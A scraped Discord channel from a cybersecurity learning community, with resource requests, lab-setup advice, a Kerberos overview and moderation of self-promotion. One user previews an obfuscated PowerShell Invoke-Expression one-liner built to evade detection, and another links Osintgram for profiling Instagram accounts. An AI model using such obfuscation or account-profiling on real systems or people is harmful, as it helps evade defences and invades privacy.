Does anyone have an idea where I can find and download or obtain this resource so I can practice with my own copy of SysmonView?

sonic abyss
#

64.zip

vivid zealot
sonic abyss
#

yes?

vivid zealot
# sonic abyss yes?

Should I click on the "code" button or the "raw" button to get the download? I'm still kind of confused about all the different ways to do stuff on github.

sonic abyss
#

Should be a download button

vivid zealot
#

Once again, Thank you so much!!
I have it downloaded and it runs fine on my computer.

idle robin
trail prawn
#

Has anyone tried this: https://www.youtube.com/watch?v=NWyqSbnsvGU&t=362s // https://github.com/Datalux/Osintgram/tree/v2?tab=readme-ov-file
Just tried it now but it does not work, unsure if I did something wrong.

become a HACKER (ethical) with ITProTV: (30% OFF): https://bit.ly/itprotvnetchuck or use code "networkchuck" (affiliate link)

Use a Python hacking tool called Osintgram to gather information about ethical hacking targets on Instagram.

VIDEO TOOLS

โžก๏ธ Commands and walkthrough: https://ntck.co/...

โ–ถ Play video
GitHub

Osintgram is a OSINT tool on Instagram. It offers an interactive shell to perform analysis on Instagram account of any users by its nickname - GitHub - Datalux/Osintgram at v2

trail prawn
stuck abyss
#

Don't watch Network Chuck kekw

ebon sphinx
#

kekw gottem

golden nova
vast thorn
#

Hi,

I wanna start a medium blog with some Walkthroughs for our French users because a lot of resources are in English. What I'm not allowed to reveal through that ? (Flags ? Some rooms ?)

stuck abyss
#

Ah it's ok, he pretty much just said no flags

vast thorn
#

To be sure I'll not post the flag itself, the most important thing is the path to find it

idle robin
fallow needle
median arrow
prisma bison
#

Please donโ€™t self promote here

wooden turtle
#

Are there any student sponsorships in cyber or tech in the US?
Trying to see what I can get for free.

idle robin
sonic abyss
earnest linden
#

Hello

Can anyone suggest a tool similar to Caldera Agent for Adversary Attack Simulation?

shut ferry
idle robin
dusky slate
#

next update will include stuff like i''Ex''""([cHaR]67+":\*\*e*\?''???''??K?''.*E") which is the same as the demo gif, but a bit more fancy

jade shell
dusky slate
#

cheers guys, appreciate it @steep turtle @jade shell

cedar island
prisma bison
#

Please don't advertise here:)

near scroll
prisma bison
#

If you want to share the resource, please post a direct link without any referral links or redirects ๐Ÿ™‚

dim marlin
#

anybody have resource for Machine Learning in Security ?

cerulean tapir
#

Ice Bear need details on how to do kali linux partitions properly because Ice bear can't find it on official documentation

stuck abyss
#

@latent kelp No self promotiuon please.

idle robin
idle robin
shut ferry
#

test

left granite
shut ferry
#

In case anyone wanted to know why attackers use reverse shells

Although there are legitimate uses for reverse shells, cybercriminals also use them to penetrate protected hosts and perform operating system commands. Reverse shells allow attackers to bypass network security mechanisms like firewalls.

idle robin
manic shadow
#

What can i buy to learn more about cybersecurity? I got a $250 amazon gift card and i was thinking what to use for, and i thought that was a good idea to buy something that will help me have more experience in this field, so what is a resource that can help me learn more about cybersecurity? (Besides books)

shut ferry
#

books

#

best resource in amazon for CS is books

leaden mirage
idle robin
prisma bison
#

Hey there, please respect our advertising guidelines (linking to other platforms) #rules ๐Ÿ™‚

flint vine
#

so LDAP 101 :

Kerberos Authentication Process

  1. The user logs on, and their password is converted to an NTLM hash, which is used to encrypt the TGT ticket. This decouples the user's credentials from requests to resources.
  2. The KDC service on the DC checks the authentication service request (AS-REQ), verifies the user information, and creates a Ticket Granting Ticket (TGT), which is delivered to the user.
  3. The user presents the TGT to the DC, requesting a Ticket Granting Service (TGS) ticket for a specific service. This is the TGS-REQ. If the TGT is successfully validated, its data is copied to create a TGS ticket.
  4. The TGS is encrypted with the NTLM password hash of the service or computer account in whose context the service instance is running and is delivered to the user in the TGS_REP.
  5. The user presents the TGS to the service, and if it is valid, the user is permitted to connect to the resource (AP_REQ).
jaunty bronze
#

Hey everyone. Who can give an advice about setting home lab on like purple teaming. There will be like me trying to hack, also some SIEM maybe, where I can also look for logs and what happened. Which resources are good to build that kind of lab?

simple creek
# jaunty bronze Hey everyone. Who can give an advice about setting home lab on like purple teami...

Soc Open Source is a Project Designed for Security Analysts and all SOC audiences who wants to play with implementation and explore the Modern SOC architecture. All of the components are used based on Open Source Projects(Available at the time of first commit).

This is Part-1, we will show the base of the model with ELK, TheHive- Cortex-MISP an...

โ–ถ Play video

Welcome to your one-stop guide for building a Free valuable Home SIEM Lab quickly and efficiently! This tutorial will help aspiring SOC analysts get practical experience without having the job yet.

Get Ahead in Your Cybersecurity Career: Practical experience is key in the cybersecurity field. This video provides you with actionable skills and ...

โ–ถ Play video
#

And maybe set it up on Kali purple

elfin minnow
#

Hey, does THM have lots of osint rooms? I've done just about all the free ones that have been recommended to me, and I'm wondering if there are more. I just did Sakuraalmost without needing walkthrough hints. Got stuck one of the geolocation bits. (And apparently that room is supposed to be easy ๐Ÿ˜‚) What are some good ones I should do next?

#

Particularly, I really enjoyed Sakura for how "real" it felt

jade shell
gritty barn
odd sinewBOT
#

Gave +1 Rep to @simple creek (current: #875 - 5)

unique crown
#

fairly recent repo

elfin minnow
elfin minnow
#

ctf.cybersoc.wales seems to be a dead link btw

jade shell
stuck abyss
#

@summer plinth Please interact more with community before posting own tools please.

summer plinth
#

Does this rule also applies for articles?

idle robin
sonic abyss
#

Awesome blog! :)

idle robin
odd sinewBOT
#

Gave +1 Rep to @sonic abyss (current: #14 - 594)

rain depot
#

Useful for those trying to have a better methodology for report writing. Some good advice here in my opinion.

jade shell
#

@idle robin @rain depot Great articles , thanks for sharing ๐Ÿ˜„

odd sinewBOT
#

Gave +1 Rep to @idle robin (current: #114 - 67)

rain depot
idle robin
hollow prism
#

does anyone have resources for computer organization/architecture

gritty barn
rain depot
odd sinewBOT
#

Gave +1 Rep to @gritty barn (current: #217 - 33)

native falcon
#

Book recommendations anyone

half osprey
native falcon
idle robin
half osprey
cyan tundra
native falcon
#

linux for beginners resources please

jade shell